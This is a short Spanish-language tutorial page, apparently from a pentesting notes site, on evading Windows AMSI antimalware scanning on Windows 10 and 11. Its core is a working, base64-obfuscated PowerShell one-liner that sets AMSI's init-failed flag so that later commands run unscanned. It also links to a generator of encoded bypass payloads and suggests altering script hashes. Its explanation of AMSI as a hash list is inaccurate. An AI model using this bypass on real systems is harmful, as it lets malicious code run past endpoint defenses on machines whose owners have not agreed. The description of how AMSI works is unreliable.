Evasión de AMSI Win10 y Win11
En esta sección vamos a analizar técnicas de evasión en tiempo real. Nos centraremos en un módulo de PowerShell que contiene un conjunto de hashes conocidos por las soluciones antivirus. Cuando el hash de un binario coincide con alguno de los que están en esa lista, el antivirus lo detecta y lo bloquea automáticamente. Este es el comportamiento típico en este tipo de escenarios, como por ejemplo:
Para evadir este tipo de antivirus ocurre algo similar a lo que pasa con los WAF: es fundamental mantenerse actualizado. Cada vez que se descubre una nueva técnica de bypass, Microsoft suele incorporarla rápidamente a su base de firmas, haciendo que deje de ser efectiva en poco tiempo.
Simplemente importando este comando, ya podrías ejecutar el comando que quieras sin ningun problema:
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
Referencia: https://pentestlaboratories.com/2021/05/17/amsi-bypass-methods/
Otra manera es esta web donde te da muchos payloas codificados para hacer lo mismo: https://amsi.fail/
Otra manera es cambiar el hash a el .ps1 que queramos subir
Última actualización